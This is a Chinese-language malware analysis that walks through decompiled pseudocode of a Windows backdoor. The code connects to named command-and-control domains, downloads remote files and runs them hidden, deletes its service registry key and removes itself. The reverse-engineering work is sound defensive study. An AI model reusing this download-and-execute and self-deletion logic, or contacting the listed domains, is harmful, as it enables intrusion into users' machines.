序言
接着上回的分析, 分析另外三个重要函数,这三个函数除了域名不一样, 没什么太大差别, 所以只分析一个即可.
StartAddress
-
- 获取函数
v0 = LoadLibraryA("kernel32.dll");
GetProcAddress(v0, &ProcName);
v1 = LoadLibraryA("kernel32.dll");
GetTempPathA = GetProcAddress(v1, "GetTempPathA");
v2 = LoadLibraryA("WS2_32.dll");
closesocket = GetProcAddress(v2, "closesocket");
v3 = LoadLibraryA("KERNEL32.dll");
lstrcatA = GetProcAddress(v3, "lstrcatA");
result = sub_404044(); //对应的域名是sbcq.f3322.org, 返回一个socket对象
-
0x4060F0
获取系统信息
...
if ( v87 <= 4 )
{
dword_401B74 = 0;
strcpy((char *)(a1 + 4), &Source); // NT
}
if ( v87 == 5 && !v88 )
{
dword_401B74 = 1;
strcpy((char *)(a1 + 4), &v92); // 2000
}
if ( v87 == 5 && v88 == 1 )
{
dword_401B74 = 0;
strcpy((char *)(a1 + 4), &v45); // XP
}
if ( v87 == 5 && v88 == 2 )
{
dword_401B74 = 1;
strcpy((char *)(a1 + 4), &v60); // 2003
}
if ( v87 == 6 && !v88 )
{
if ( (unsigned __int8)v90 == 1 )
{
dword_401B74 = 0;
strcpy((char *)(a1 + 4), &v98); // vista
}
else
{
dword_401B74 = 1;
strcpy((char *)(a1 + 4), &v48); // 2008
}
}
...
-
- 获取目标文件下载地址
if ( !sub_403758(socketObject, (int)buf, 8) || !sub_403758(socketObject, (int)Parameters, *(int *)buf) )// 下载地址存放在Parameters
break;
-
- 指令
0x10
- 指令
case 0x10u:
CmdLine = 0;
memset(&v25, 0, 0x100u);
v26 = 0;
v27 = 0;
v32 = 0;
memset(&v33, 0, 0x7Cu);
v34 = 0;
v35 = 0;
GetTempPathA(0x104, &CmdLine);
v17 = GetTickCount();
wsprintfA(&v32, "%d", v17);
lstrcatA(&CmdLine, &v32);
v18 = LoadLibraryA(&LibFileName);
downloadFile = GetProcAddress(v18, &v79);
downloadFile(0, Parameters, &CmdLine, 10, 0); //Parameters是远程文件, cmdLine本机指定路径
// HRESULT URLDownloadToFile(
// LPUNKNOWN pCaller,
// LPCTSTR szURL,
// LPCTSTR szFileName,
// _Reserved_ DWORD dwReserved,
// LPBINDSTATUSCALLBACK lpfnCB
// );
if ( v37 == 0x11 )
v20 = 5;
else
v20 = 0;
WinExec(&CmdLine, v20); // 0 - SW_HIDE, 5 - SW_SHOW
break;
-
- 指令
0x12
- 指令
v8 = OpenMutexA(0x1F0001u, 0, "Ghijkl Nopqrstu Wxy");
v9 = v8;
if ( v8 ){
ReleaseMutex(v8);
CloseHandle(v9);
}
Dest = 0;
memset(&v47, 0, 0x100u);
v48 = 0;
v49 = 0;
v28 = 0;
memset(&v29, 0, 0x7Cu);
v30 = 0;
v31 = 0;
GetTempPathA(0x104, &Dest);
Size = sub_406C30(0x1Au) + 'a';
v11 = sub_406C30(0x1Au) + 'a';
v12 = sub_406C30(0x1Au) + 'a';
v13 = sub_406C30(0x1Au) + 'a';
v14 = sub_406C30(0x1Au);
wsprintfA(&v28, "%c%c%c%c%ccn.exe", v14 + 'a', v13, v12, v11, Size); //生成一个在tmp文件夹下的随机文件名,
lstrcatA(&Dest, &v28);
v15 = LoadLibraryA(&LibFileName);
downloadFile = GetProcAddress(v15, &v79);
if ( !downloadFile(0, Parameters, &Dest, 10, 0))
{
sub_40351A("Ghijkl Nopqrstu Wxy"); // 如果存在此服务,则删除
memset(&pszSubKey, 0, 0x104u);
v115 = "SYSTEM\\CurrentControlSet\\Services";
sprintf(&pszSubKey, "%s%s", &v115, "Ghijkl Nopqrstu Wxy");
SHDeleteKeyA(HKEY_LOCAL_MACHINE, &pszSubKey);// 通知系统, 这个地方注册表有改动
closesocket(socketObject);
deleteItSelf(); // 删除自身
WinExec(&Dest, 0u);
ExitProcess(0u);
}
break;
-
0x14
case 0x14u:
File = 'iexplore.exe';
Operation = 'open';
v7 = GetDesktopWindow();
ShellExecuteA(v7, &Operation, &File, Parameters, 0u, 1); // parameter 是一个文件下载地址
break;
}
-
0x6
v21 = OpenMutexA(0x1F0001u, 0, "Ghijkl Nopqrstu Wxy");
v22 = v21;
if ( v21 )
{
ReleaseMutex(v21);
CloseHandle(v22);
}
sub_40351A("Ghijkl Nopqrstu Wxy"); //删除服务
memset(&Dest, 0, 0x104u);
v115 = "SYSTEM\\CurrentControlSet\\Services\\"
sprintf(&Dest, "%s%s", &v115, "Ghijkl Nopqrstu Wxy");
SHDeleteKeyA(HKEY_LOCAL_MACHINE, &Dest);
closesocket(socketObject);
deleteItSelf();
ExitProcess(0u);
-
- 其他指令
switch ( v37 )
{
case 2u:
lstrcpynA(Parameter, String2, 0x104);
dword_409374 = *(_DWORD *)Parameters;
dword_40937C = v40;
dword_409378 = v39;
dword_409380 = v41;
sub_403135(Parameter); // 没啥用
break;
case 3u:
dword_409240 = *(_DWORD *)Parameters;
dword_409248 = v40;
dword_409244 = v39;
dword_409254 = v41;
dword_40924C = *(_DWORD *)String2;
dword_409250 = v43;
lstrcpynA(byte_409140, &v44, 0x80);
v6 = lstrlenA(byte_409140);
lstrcpynA(byte_4091C0, &v45[v6], 0x80);
sub_403280(byte_409140); // 构造 Request Header
break;
case 4u:
lstrcpynA(String, String2, 0x80);
v5 = lstrlenA(String);
lstrcpynA(String1, &String2[v5 + 1], 0x200);
dword_409608 = *(_DWORD *)Parameters;
dword_409610 = v40;
dword_40960C = v39;
dword_409614 = v41;
sub_403311(String); // 没啥用
break;
case 5u:
dword_401C84 = 1;
break;
}
域名
www.520123.xyz sbcq.f3322.org www.520520520.org
多说一点
吾爱破解上面有好几个这样的分析,可能最后释放的那个
DLL
功能不一样, 下面贴一下连接